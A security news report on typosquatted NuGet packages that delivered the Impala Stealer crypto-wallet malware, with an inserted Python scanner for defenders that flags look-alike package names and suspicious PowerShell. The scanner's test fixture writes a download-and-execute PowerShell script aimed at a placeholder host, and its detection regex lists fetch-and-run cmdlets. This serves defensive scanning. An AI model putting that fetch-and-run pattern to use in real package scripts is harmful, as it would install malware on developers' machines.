Cybersecurity researchers have detailed the inner workings of the cryptocurrency stealer malware that was distributed via 13 malicious NuGet packages as part of a supply chain attack targeting .NET developers.
The sophisticated typosquatting campaign, which was uncovered by JFrog late last month, impersonated legitimate packages to execute PowerShell code designed to retrieve a follow-on binary from a hard-coded server.
The two-stage attack culminates in the deployment of a .NET-based persistent backdoor, called Impala Stealer, which is capable of gaining unauthorized access to users’ cryptocurrency accounts.
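Package-level checks a defender can run before install, written here as an added example rather than code from JFrog or the article: it unpacks a `.nupkg` (a zip), lists any embedded PowerShell scripts, flags download/execute cmdlets in them, and compares the package id against an allow-list of well-known ids to catch look-alike names. The allow-list, the cmdlet heuristics, the `tools/init.ps1` location and the sample package are all assumptions constructed for the demonstration.

```python
import io
import re
import zipfile
from difflib import SequenceMatcher

# Hypothetical allow-list of popular package ids that a typosquat would imitate.
KNOWN_PACKAGES = ["Newtonsoft.Json", "Serilog", "Dapper"]

# Assumed heuristics: cmdlets typical of a "fetch a second stage and run it" script.
SUSPICIOUS = re.compile(
    r"Invoke-WebRequest|DownloadString|DownloadFile|Start-Process|Invoke-Expression|\bIEX\b",
    re.IGNORECASE,
)

def typosquat_candidates(package_id, known=KNOWN_PACKAGES, threshold=0.85):
    """Return known ids that are confusingly similar to package_id but not identical."""
    hits = []
    for k in known:
        if k.lower() == package_id.lower():
            continue  # exact match is the legitimate package, not a typosquat
        if SequenceMatcher(None, k.lower(), package_id.lower()).ratio() >= threshold:
            hits.append(k)
    return hits

def scan_nupkg(data, package_id):
    """Inspect .nupkg bytes for PowerShell scripts and report suspicious cmdlets per script."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if name.lower().endswith(".ps1"):
                body = z.read(name).decode("utf-8", errors="replace")
                cmdlets = sorted({m.group(0) for m in SUSPICIOUS.finditer(body)})
                findings.append({"script": name, "cmdlets": cmdlets})
    return {"typosquat_of": typosquat_candidates(package_id), "scripts": findings}

def build_sample_nupkg():
    """Constructed fixture: a look-alike package whose tools/init.ps1 fetches and runs a binary."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("Newtonsoft.Jsn.nuspec",
                   "<package><metadata><id>Newtonsoft.Jsn</id></metadata></package>")
        z.writestr("tools/init.ps1",
                   "Invoke-WebRequest -Uri http://stage2.example.invalid/s.exe -OutFile $env:TEMP\\s.exe\n"
                   "Start-Process $env:TEMP\\s.exe")
    return buf.getvalue()

if __name__ == "__main__":
    print(scan_nupkg(build_sample_nupkg(), "Newtonsoft.Jsn"))
```

A clean package yields an empty `scripts` list and no `typosquat_of` hits; either field being non-empty is a reason to hold the package for manual review.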
“The payload used a very rare obfuscation technique, called ‘.NET AoT compilation,’ which is a lot more stealthy than using ‘off the shelf’ obfuscators while still making the binary hard to reverse engineer,” JFrog told The Hacker News in a statement.
.NET AoT compilation is an optimization technique that compiles an app ahead of time to native code. Native AOT apps also start faster, have smaller memory footprints, and can run on a machine without the .NET runtime installed.
“The bad actors used typosquatting techniques to deploy a custom malicious payload […] which targets the Exodus crypto wallet and leaks the victim’s credentials to cryptocurrency exchanges, by using code injection,” Shachar Menashe, senior director at JFrog Security Research, said.
“Our investigation proves no open source software repository is completely trustworthy, so safety measures should be taken at every step of the software development lifecycle to ensure the software supply chain remains secure.”
The findings come as Phylum unearthed a malicious npm package named mathjs-min that was uploaded to the repository on March 26, 2023, and found to harbor a credential stealer that grabs Discord passwords from the official app as well as web browsers like Google Chrome, Brave, and Opera.